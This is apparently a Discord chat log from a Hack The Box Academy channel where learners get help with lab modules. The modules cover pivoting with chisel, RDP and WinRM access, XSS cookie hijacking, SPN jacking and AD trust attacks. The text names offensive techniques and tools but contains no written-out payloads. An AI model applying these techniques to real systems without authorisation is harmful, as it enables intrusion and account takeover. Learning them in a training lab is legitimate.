Hello guys, I'm currently stuck for a few days now on ARP Spoofing & Abnormality Detection. I downloaded the file. Open Wireshark. Try the arp.opcode and its saying not found. nothing pulls up in my searching....I've tried even other method to complete this module. Can I get some help!
You can DM me the filter you're using but if you're using the correct filter you should see the results. Sounds like you didn't load the file properly or something.
No luck with this either I tried Arturo with those ipv6 can anyone help?
I have chisel on the web powershell running tried RDP with it true smh with it nothing I don't get the hint offered or how to make use of on
@rustic sage i had to do some googling
Is it not chisel from the web shell to your local box?
Then there after? You said RDP so I'm confused how
I don't see how RDP happened from this
I tried two accounts with RDP and with ipv6
i would recommend using ligolo-ng, once you learn its syntax it makes life way easier. John Hammond made a great video on it
its better than chisel imo
in regards to your original question, it is possible to use win-rm as Arturo
in powershell, you just have to get the syntax right
I used chisel then used winrm on Linux fuck me
I did this module a while back, why are you running winrm on windows
Linux
are you not*
I chisel to crackmap winrm
Web powershell , chisel to me, RDP was an issue I tried dahlia and Arturo
Chisel sucks balls I'm about to throw this away
xfreerdp, rdp is running on a different port, you have to specify port with xfreerdp command
run an nmap scan on the ip
once you find the port you can rdp with with dahlia or arturos credentials
Dumb I don't know why I tried to chisel through this web shell
this module took me a lot of time, don't rush it
It seemed pretty logical to chisel through this method
but learned a lot, keep updating
It is what it is
Fawk
Got my ass chiseled
lol
How long did it take you to do this skill assessment?
You know you can always DM about the Modules, right?
Got most of them done
I thought you might've been sleeping since you're in Belgium. It is like 10 o'clock there.
Found that little sneaky bastard
feel the rush?
Finding a flag is like releasing a very bad constipated shit I'm glad it's over
I don't know why I thought it would be a good idea to chisel through that stupid web Chelle
I'm on the American continent actually
Shell
It seemed very logical but I found out soothing worked
Nothing
Instead of bouncing my head in one spot I need to step back
But might take a short nap since I'm spent from a "engagement"
I'm on EST, you?
Might be both 
I prefer the box that won't take me for child support and alimony
hahahahha same opinion
I just stay to my self I seem to attract ladies on psych meds
Why is there so many jobs all of a sudden
The job stork came
I offered a blood sacrifice to baphomet for Lord Rothschild
XSS module on HTB Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag. Does anyone know where to insert the cookie theres no cookie stored in storage within devtools.
The section explains how to insert the cookie into your browser's section with devtools. There are other ways too like using the Cookie-Editor add-on.
im actually blind i didnt even read what was written. thank you
It would help a ton
Sounds like you're not using a wordlist that contains the password
The thing is I have no idea what kinda words or numericals or symbols the password might contain so I can't place a finger on which word list to use
does the module include a wordlist?
Nope it doesn't
which module and section
Actually idk what that is, I'm very new to ethical hacking and just typed the message out here cause I got directed here from general
This channel is for discussion of the various modules on Hack The Box's Academy platform.
Is there anyway to crack the password? I'd really appreciate any amount of help
Where should I text for queries like this?
It's also not to help with random hacking stuff. It's about discussion of the various HTB platforms, sounds unrelated.
Well, HTB does have modules related to password attacks and brute forcing. I'd recommend those.
Okay thanks
could someone help with this question on File Transfers module
Upload the attached file named upload_win.zip to the target using the method of your choice. Once uploaded, unzip the archive, and run "hasher upload_win.txt" from the command line. Submit the generated hash as your answer.
I can't seem to figure out how to upload files from linux considering this part of the module was regarding Windows File Transfer methods to linux...
is there a solution for dacl II spn jacking doing it from linux? i got the same error as someone before "KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)"
oh and its the last question abusing account with gabriel and use the spn jacking technique for compromising WEB01
nvm i just restarted the machine forgot that the hash of the Machine Account has changed all good
Smbclient, python web server
Xfreerdp has the /drive: option
I couldn't get xfreerdp to work so i used rdesktop
but python HTTP server got the job done - thank you
best modules to start with after doing the linux fundamentals? i want to learn on a strong foundation
The skill path "Information Security Foundations" is a good start.
I was going to answer that it would be mostly an auth error. Mostly wrong creds
Windows lateral movement IPv6 is cancer
sorry I just saw this message late!
I will
Hello
I am doing web attacks skills assessment
I am trying to change a user's password with all the values i need to specify but i get an error saying "missing parameters"
can you link the module you're working happy to see if ive completed it
@signal hound ^
Sure
havent done that one, sorry
Hi. I am doing the Active Directory Trust Attacks, abusing SQL server links and it seems SQL02 is not reachable. I am receiving the same message as it was mentioned here: #modules message . I changed vpn region, spawned a fresh target, but no lucky. Can someone check if there is an issue, please? From Sql01, test-connection reports tcptestsucceded true whereas for sql02 is reporting as false.
